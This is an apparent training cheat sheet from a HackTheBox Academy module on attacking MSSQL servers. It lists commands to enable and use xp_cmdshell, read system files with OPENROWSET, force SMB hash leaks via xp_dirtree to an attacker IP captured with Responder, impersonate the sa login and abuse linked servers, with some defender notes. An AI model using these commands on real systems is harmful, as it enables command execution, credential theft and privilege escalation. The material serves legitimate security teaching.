MSSQL Commands

MSSQL default system databases:

  • master - keeps the information for an instance of SQL Server.

  • msdb - used by SQL Server Agent.

  • model - a template database copied for each new database.

  • resource - a read-only database that keeps the system objects visible in every database on the server under the sys schema.

  • tempdb - keeps temporary objects for SQL queries.

-- Lists the databases on this instance. sysdatabases is the legacy compatibility
-- view; sys.databases is the current catalog view and exposes the same name column.
SELECT name
FROM master.dbo.sysdatabases
GO
-- Switches the session to the htbusers database so unqualified table names resolve there
USE htbusers
GO
-- Lists the tables in htbusers. table_name in the second statement is a placeholder
-- for one of the names this returns; SELECT * is fine for a first look, but name the
-- columns explicitly in anything that is kept.
SELECT table_name
FROM htbusers.INFORMATION_SCHEMA.TABLES
GO
SELECT *
FROM table_name
-- Enables xp_cmdshell. The option is hidden behind 'show advanced options', so both
-- settings have to be switched on, and each change only takes effect after RECONFIGURE.
-- Defender note: each of these configuration changes is reported as a message and
-- written to the SQL Server error log, which makes them a sensible alerting point.
EXEC sp_configure 'show advanced options', 1
GO
RECONFIGURE
GO
EXEC sp_configure 'xp_cmdshell', 1
GO
RECONFIGURE
GO

-- With xp_cmdshell enabled, runs an OS command. whoami reports which OS account the
-- command executes as: the SQL Server service account unless a proxy account is configured.
EXEC master..xp_cmdshell 'whoami'
GO
-- Reads the Windows hosts file (the Windows counterpart of /etc/hosts) through
-- OPENROWSET(BULK ...). SINGLE_CLOB returns the whole file as one row with a single
-- column named BulkColumn, so that column is selected by name rather than with *.
-- The caller needs the ADMINISTER BULK OPERATIONS permission for this to succeed.
SELECT BulkColumn
FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
GO

-- Runs the same OPENROWSET read on the linked server LOCAL.TEST.LINKED.SRV. The inner
-- quotes are doubled because the statement is passed as a string; EXEC ... AT requires
-- RPC OUT to be enabled on that linked server.
EXEC('SELECT * FROM OPENROWSET(BULK N''C:/Users/Administrator/Desktop/flag.txt'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV]
-- Asks the server to list the directory tree of a UNC share. The SQL Server service
-- account makes the outbound SMB connection, so it is that account's credentials that
-- are presented to whatever answers at the UNC path.
-- Defender note: outbound SMB from database hosts to arbitrary addresses is rarely
-- needed; egress filtering on TCP 445 and a low-privilege service account limit the impact.
EXEC master.dbo.xp_dirtree '\\10.10.110.17\share\'

# Attacker machine: Responder, listening on tun0, records the hash presented by the
# account SQL Server uses for the SMB connection when the xp_dirtree step above runs
sudo responder -I tun0

OR

# Attacker machine, alternative: an impacket SMB server exposing the current directory
# under the share name "share" records the same hash when xp_dirtree connects to it
sudo impacket-smbserver share ./ -smb2support
-- Logins that appear as the grantor of an IMPERSONATE server permission; in practice
-- that is the login being impersonated. Note the query does not filter on who holds
-- the grant, so confirm with the EXECUTE AS LOGIN check further down.
SELECT DISTINCT sp.name
FROM sys.server_permissions AS perm
INNER JOIN sys.server_principals AS sp
    ON perm.grantor_principal_id = sp.principal_id
WHERE perm.permission_name = 'IMPERSONATE'
GO

-- The same query on a single line, for pasting into a one-line prompt
SELECT DISTINCT sp.name FROM sys.server_permissions AS perm INNER JOIN sys.server_principals AS sp ON perm.grantor_principal_id = sp.principal_id WHERE perm.permission_name = 'IMPERSONATE'

-- Shows the current login and whether it is a member of the sysadmin server role.
-- IS_SRVROLEMEMBER returns 1 for a member, 0 otherwise, and NULL when the role or
-- login is not valid. Run this before and after EXECUTE AS to confirm the context switch.
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
-- Switches the execution context to the sa login (requires IMPERSONATE on it), then
-- repeats the two checks: SYSTEM_USER should now report sa and the role check return 1.
-- REVERT restores the original context afterwards.
EXECUTE AS LOGIN = 'sa'
SELECT SYSTEM_USER
SELECT IS_SRVROLEMEMBER('sysadmin')
GO
-- Lists the servers known to this instance. sysservers is the legacy compatibility view
-- (sys.servers is the current one); the isremote flag is explained below.
SELECT srvname, isremote
FROM sysservers

-- Runs a pass-through query on the linked server 10.0.0.12\SQLEXPRESS and returns its
-- name, version, the login the link authenticates as, and whether that login is sysadmin.
-- Defender note: the result reflects the linked-server login mapping, so a link mapped
-- to a sysadmin login can hand that role to anyone permitted to use the link.
EXEC('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
GO

# In the query's output, srvname is the server name and isremote indicates the type: 1 means a remote server, 0 means a linked server.

-- Reads the username column of tb_users in TestAppDB on the linked server, using the
-- four-part name (server.database.schema.table) and an explicit table alias
SELECT u.username
FROM [LOCAL.TEST.LINKED.SRV].[TestAppDB].[dbo].[tb_users] AS u
  • hackthebox academy - attacking with common service (mssql)
